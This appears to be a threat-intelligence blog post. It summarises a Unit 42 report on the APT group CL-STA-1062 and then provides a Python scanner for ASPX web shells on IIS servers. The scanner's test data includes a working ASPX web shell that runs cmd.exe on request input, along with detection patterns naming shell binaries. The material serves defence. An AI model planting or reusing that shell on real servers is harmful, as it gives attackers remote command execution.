A recent report by Unit 42 highlights the Chinese APT group CL-STA-1062, which has expanded its operations against Southeast Asian government and critical energy infrastructure since mid-2025. The group, previously linked to attacks on Taiwan's web infrastructure, gains a foothold on exposed web servers with ASPX web shells and then relies on open-source tooling for the rest of the intrusion, including SoftEther VPN for covert tunnelling into the network and Mimikatz for harvesting credentials from memory.
The attackers have also developed a custom backdoor, TinyRCT, that executes operator commands and exfiltrates data. Observed intrusions have resulted in significant data theft and broad internal reconnaissance, a pattern consistent with an actor building long-term access to, and control over, the affected networks rather than pursuing one-off objectives. The report warns that this activity is likely to grow, with continued attacks on energy and government entities across the region.
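Because ASPX web shells are the report's stated entry point, a defender's first practical step is to hunt for them on IIS hosts. The scanner below is an added example written for this page, not Unit 42's tooling and not an indicator set from the report: it walks a web root, scores ASP.NET source files against generic web-shell heuristics (process spawning, shell binaries, assembly loading, base64 decoding, request-driven input), and flags files that exceed a threshold. The two sample pages and the `uploads/img.aspx` location are constructed for the demonstration; the weights and threshold are assumptions to tune for your environment.

```python
"""Heuristic hunt for ASPX web shells in an IIS web root.

Added example for this page. The indicator patterns are generic web-shell
traits, not indicators published in the Unit 42 report.
"""
import os
import re
import tempfile

# Pattern -> weight. Assumption: weights are illustrative, not calibrated.
INDICATORS = {
    r"Process\.Start\s*\(|ProcessStartInfo": 3,      # spawning a child process
    r"cmd\.exe|powershell(\.exe)?": 3,               # shell binaries referenced
    r"Assembly\.Load\s*\(": 3,                       # in-memory .NET loading
    r"eval\s*\(|JScript\.Eval": 3,                   # dynamic code evaluation
    r"Request\s*(\.Form|\.QueryString|\.Headers)?\s*\[": 1,  # operator-controlled input
    r"Convert\.FromBase64String": 1,                 # encoded payload/commands
    r"Server\.MapPath|File\.WriteAllBytes|SaveAs\s*\(": 1,   # dropping files on disk
}
THRESHOLD = 4
ASPNET_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asax")


def score_source(src: str) -> int:
    """Sum the weights of every indicator present at least once."""
    return sum(w for pat, w in INDICATORS.items() if re.search(pat, src, re.IGNORECASE))


def scan_webroot(root: str, threshold: int = THRESHOLD):
    """Return [(relative_path, score)] for ASP.NET files scoring >= threshold."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ASPNET_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                score = score_source(fh.read())
            if score >= threshold:
                hits.append((os.path.relpath(path, root), score))
    return sorted(hits)


# Constructed sample: a minimal command-execution web shell (not a real artefact).
SHELL_SAMPLE = """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string c = Request["cmd"];
    if (c != null) {
        ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", "/c " + c);
        psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
        Response.Write(Process.Start(psi).StandardOutput.ReadToEnd());
    }
}
</script>
"""

# Constructed sample: an ordinary page that reads a query parameter safely.
BENIGN_SAMPLE = """<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string q = Request.QueryString["q"];
    lbl.Text = Server.HtmlEncode(q ?? "");
}
</script>
<html><body><asp:Label id="lbl" runat="server"/></body></html>
"""


def demo():
    """Write both samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "uploads", "img.aspx"), "w", encoding="utf-8") as fh:
            fh.write(SHELL_SAMPLE)
        with open(os.path.join(root, "Default.aspx"), "w", encoding="utf-8") as fh:
            fh.write(BENIGN_SAMPLE)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, score in demo():
        print(f"suspicious: {rel} (score {score})")
```

Static scoring like this catches unobfuscated shells and is cheap to run across a fleet, but a shell that assembles its strings at runtime or hides in a renamed extension will score low. Pair the file scan with IIS log review (POST requests to recently created pages, especially under upload or image directories) and with a baseline of file hashes taken from a known-good deployment.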